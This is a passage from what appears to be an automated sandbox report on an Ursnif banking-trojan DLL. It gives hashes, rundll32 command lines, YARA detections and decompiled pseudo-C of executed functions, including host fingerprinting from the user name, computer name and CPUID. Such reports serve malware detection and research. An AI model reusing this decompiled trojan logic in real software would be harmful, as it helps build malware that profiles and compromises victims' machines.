                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:35
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:39
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E02F912D4(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				CHAR* _v20;
                                                                                                                                                                                                                                    				struct _FILETIME _v28;
                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                    				long _v344;
                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                                                    				CHAR* _t83;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				signed char _t89;
                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				long _t99;
                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                                    				char* _t111;
                                                                                                                                                                                                                                    				void* _t113;
                                                                                                                                                                                                                                    				int _t119;
                                                                                                                                                                                                                                    				char _t128;
                                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                    				char* _t139;
                                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                                    				char* _t141;
                                                                                                                                                                                                                                    				char* _t146;
                                                                                                                                                                                                                                    				signed char* _t148;
                                                                                                                                                                                                                                    				int _t151;
                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    				_t148 = __eax;
                                                                                                                                                                                                                                    				_t72 =  *0x2f9d278; // 0x63699bc3
                                                                                                                                                                                                                                    				_t74 = RtlAllocateHeap( *0x2f9d238, 0, _t72 ^ 0x63699ac7);
                                                                                                                                                                                                                                    				_v20 = _t74;
                                                                                                                                                                                                                                    				if(_t74 == 0) {
                                                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t76 =  *0x2f9d278; // 0x63699bc3
                                                                                                                                                                                                                                    				_t78 = RtlAllocateHeap( *0x2f9d238, 0, _t76 ^ 0x63699bce);
                                                                                                                                                                                                                                    				_t146 = 0;
                                                                                                                                                                                                                                    				_v36 = _t78;
                                                                                                                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, _t146, _v20);
                                                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t136 =  *0x2f9d278; // 0x63699bc3
                                                                                                                                                                                                                                    				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                                                                                                                                                                    				_t81 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                                    				_t5 = _t81 + 0x2f9e7f2; // 0x73797325
                                                                                                                                                                                                                                    				_t83 = E02F995B1(_t5);
                                                                                                                                                                                                                                    				_v20 = _t83;
                                                                                                                                                                                                                                    				if(_t83 == 0) {
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, _t146, _v36);
                                                                                                                                                                                                                                    					goto L35;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                                                    				_v28.dwLowDateTime = 0x63699bce;
                                                                                                                                                                                                                                    				_v28.dwHighDateTime = 0x63699bce;
                                                                                                                                                                                                                                    				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                    				_v32 = _t85;
                                                                                                                                                                                                                                    				if(_t85 != 0x63699bce) {
                                                                                                                                                                                                                                    					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                                                    					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                                                    					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                                                                    					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                                                    				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                                                    				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                                                    				 *_t148 = _t91;
                                                                                                                                                                                                                                    				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                                                    				_t93 =  *0x2f9d27c; // 0x44a5a8
	_t16 = _t93 + 0x2f9e813; // 0x642e2a5c
	_v40 = _t146;
	_v44 = _t89 & 0x000000ff;
	__imp__(_v20, _t16);
	_t96 = FindFirstFileA(_v20,  &_v368); // executed
	_v16 = _t96;
	if(_t96 == _t134) {
		_t146 = 0;
		goto L34;
	}
	_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
	while(_t99 > 0) {
		_t101 = FindNextFileA(_v16,  &_v368); // executed
		if(_t101 == 0) {
			FindClose(_v16);
			_v16 = FindFirstFileA(_v20,  &_v368);
			_v28.dwHighDateTime = _v344;
			_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
		}
		_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
	}
	_v12 = _v12 & 0x00000000;
	while(1) {
		_t109 = _v44;
		if(_v12 <= _t109) {
			goto L15;
		}
		_t140 = _v12;
		if(_t140 > _v32) {
			_t141 = _v36;
			 *_a4 = _t141;
			while(1) {
				_t128 =  *_t141;
				if(_t128 == 0) {
					break;
				}
				if(_t128 < 0x30) {
					 *_t141 = _t128 + 0x20;
				}
				_t141 = _t141 + 1;
			}
			_v12 = 1;
			FindClose(_v16); // executed
			_t146 = 0;
			goto L35;
		}
		_t165 = _t140 - _t109;
		L15:
		if(_t165 == 0 || _v12 == _v32) {
			_t111 = StrChrA( &(_v368.cFileName), 0x2e);
			_t139 = _v40;
			_t151 = _t111 -  &(_v368.cFileName);
			_t113 = 0;
			if(_t139 != 0) {
				_t48 = _t151 - 4; // -4
				_t113 = _t48;
				if(_t113 > _t151) {
					_t113 = 0;
				}
			}
			if(_t151 > 4) {
				_t151 = 4;
			}
			memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
			_t154 = _t154 + 0xc;
			_v40 =  &(_v40[_t151]);
		}
		do {
			_t119 = FindNextFileA(_v16,  &_v368); // executed
			if(_t119 == 0) {
				FindClose(_v16);
				_v16 = FindFirstFileA(_v20,  &_v368);
			}
		} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
		_v12 = _v12 + 1;
	}
}
                                                                                                                                                                                                                                    0x02f9147e
                                                                                                                                                                                                                                    0x02f91484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91486
                                                                                                                                                                                                                                    0x02f9148c
                                                                                                                                                                                                                                    0x02f91533
                                                                                                                                                                                                                                    0x02f91536
                                                                                                                                                                                                                                    0x02f91543
                                                                                                                                                                                                                                    0x02f91543
                                                                                                                                                                                                                                    0x02f91547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9153c
                                                                                                                                                                                                                                    0x02f91540
                                                                                                                                                                                                                                    0x02f91540
                                                                                                                                                                                                                                    0x02f91542
                                                                                                                                                                                                                                    0x02f91542
                                                                                                                                                                                                                                    0x02f9154c
                                                                                                                                                                                                                                    0x02f91553
                                                                                                                                                                                                                                    0x02f91555
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91555
                                                                                                                                                                                                                                    0x02f91492
                                                                                                                                                                                                                                    0x02f91494
                                                                                                                                                                                                                                    0x02f91494
                                                                                                                                                                                                                                    0x02f914a7
                                                                                                                                                                                                                                    0x02f914ad
                                                                                                                                                                                                                                    0x02f914b8
                                                                                                                                                                                                                                    0x02f914ba
                                                                                                                                                                                                                                    0x02f914be
                                                                                                                                                                                                                                    0x02f914c0
                                                                                                                                                                                                                                    0x02f914c0
                                                                                                                                                                                                                                    0x02f914c5
                                                                                                                                                                                                                                    0x02f914c7
                                                                                                                                                                                                                                    0x02f914c7
                                                                                                                                                                                                                                    0x02f914c5
                                                                                                                                                                                                                                    0x02f914cc
                                                                                                                                                                                                                                    0x02f914d0
                                                                                                                                                                                                                                    0x02f914d0
                                                                                                                                                                                                                                    0x02f914e0
                                                                                                                                                                                                                                    0x02f914e5
                                                                                                                                                                                                                                    0x02f914e8
                                                                                                                                                                                                                                    0x02f914e8
                                                                                                                                                                                                                                    0x02f914eb
                                                                                                                                                                                                                                    0x02f914f5
                                                                                                                                                                                                                                    0x02f914fd
                                                                                                                                                                                                                                    0x02f91502
                                                                                                                                                                                                                                    0x02f91510
                                                                                                                                                                                                                                    0x02f91510
                                                                                                                                                                                                                                    0x02f91524
                                                                                                                                                                                                                                    0x02f91528
                                                                                                                                                                                                                                    0x02f91528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02F912FF
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02F91321
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9133B
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02F923E9,63699BCE,02F91354,73797325), ref: 02F995C2
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F995DC
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F91379
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F9138D
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F913A4
                                                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F913B0
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 02F913F1
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 02F91407
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F91425
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(02F996C1,?), ref: 02F91439
                                                                                                                                                                                                                                    • FindClose.KERNEL32(02F996C1), ref: 02F91446
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02F91452
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F91474
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 02F914A7
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 02F914E0
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(02F996C1,?), ref: 02F914F5
                                                                                                                                                                                                                                    • FindClose.KERNEL32(02F996C1), ref: 02F91502
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02F9150E
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F9151E
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(02F996C1), ref: 02F91553
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 02F91565
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F91575
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                                                    • Opcode ID: d2a73650bd19401bbb9cffb344c5e7ff7741a0d8dd49bc176e8ac53c03a6749f
                                                                                                                                                                                                                                    • Instruction ID: 3dd0f2978778f760728f5df8e2b859c6519b123561035cd1f2921414cc3c1535
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a73650bd19401bbb9cffb344c5e7ff7741a0d8dd49bc176e8ac53c03a6749f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16815BB2D0010AAFEF21DFA5DC44AEFBBB9FB49780F110566E609E6250D7319A54CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 204 40102f-401086 GetSystemTimeAsFileTime _aulldiv _snwprintf 205 401088 204->205 206 40108d-4010a6 CreateFileMappingW 204->206 205->206 207 4010f0-4010f6 GetLastError 206->207 208 4010a8-4010b1 206->208 211 4010f8-4010fe 207->211 209 4010c1-4010cf MapViewOfFile 208->209 210 4010b3-4010ba GetLastError 208->210 213 4010d1-4010dd 209->213 214 4010df-4010e5 GetLastError 209->214 210->209 212 4010bc-4010bf 210->212 215 4010e7-4010ee CloseHandle 212->215 213->211 214->211 214->215 215->211
                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                    			E0040102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                    				L00402100();
                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                    				_t15 =  *0x404150;
                                                                                                                                                                                                                                    				_push(_t15 + 0x40505e);
                                                                                                                                                                                                                                    				_push(_t15 + 0x405054);
                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                    				L004020FA();
                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                    				_t34 = _t19;
                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040103C
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401052
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 00401077
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 0040109C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010B3
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010DF
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004010E8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed): graph for the function at 02F9269C; nodes call GetUserNameW, RtlAllocateHeap, GetComputerNameW and HeapFree.
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E02F9269C(char __eax, signed int* __esi) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                    				long _t50;
                                                                                                                                                                                                                                    				char _t59;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				signed int* _t64;
                                                                                                                                                                                                                                    				char _t65;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				signed int* _t69;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = __eax;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					_t59 =  *0x2f9d270; // 0xd448b889
                                                                                                                                                                                                                                    					_v12 = _t59;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t64 = _t69;
                                                                                                                                                                                                                                    				E02F96B43( &_v12, _t64);
                                                                                                                                                                                                                                    				if(_t65 != 0) {
                                                                                                                                                                                                                                    					 *_t69 =  *_t69 ^  *0x2f9d278 ^ 0x4c0ca0ae;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                    					_t50 = _v8;
                                                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                                                    						_t62 = RtlAllocateHeap( *0x2f9d238, 0, _t50 + _t50);
                                                                                                                                                                                                                                    						if(_t62 != 0) {
                                                                                                                                                                                                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                    								_t63 = _t62;
                                                                                                                                                                                                                                    								 *_t69 =  *_t69 ^ E02F92496(_v8 + _v8, _t63);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							HeapFree( *0x2f9d238, 0, _t62);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t61 = __imp__;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                    				_t34 = _v8;
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t68 = RtlAllocateHeap( *0x2f9d238, 0, _t34 + _t34);
                                                                                                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                                                                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                    							_t63 = _t68;
                                                                                                                                                                                                                                    							_t69[3] = _t69[3] ^ E02F92496(_v8 + _v8, _t63);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, 0, _t68);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                    				_t67 =  &_v28;
                                                                                                                                                                                                                                    				 *_t67 = 1;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                    				 *(_t67 + 8) = _t63;
                                                                                                                                                                                                                                    				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                    				_t69[1] = _t69[1] ^ _t39;
                                                                                                                                                                                                                                    				return _t39;
                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 02F926D3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 02F926EA
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 02F926F7
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02F923D9), ref: 02F92718
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F9273F
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02F92753
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F92760
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02F923D9), ref: 02F9277E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                    • Opcode ID: 71db3f6384662438569d6779dcdfed94a5d4a2fd1970f8467fd7589798aeab48
                                                                                                                                                                                                                                    • Instruction ID: 16254d2c24303e20f678e0edd355844490c5d1f357fb779c3aecc486ac00827a
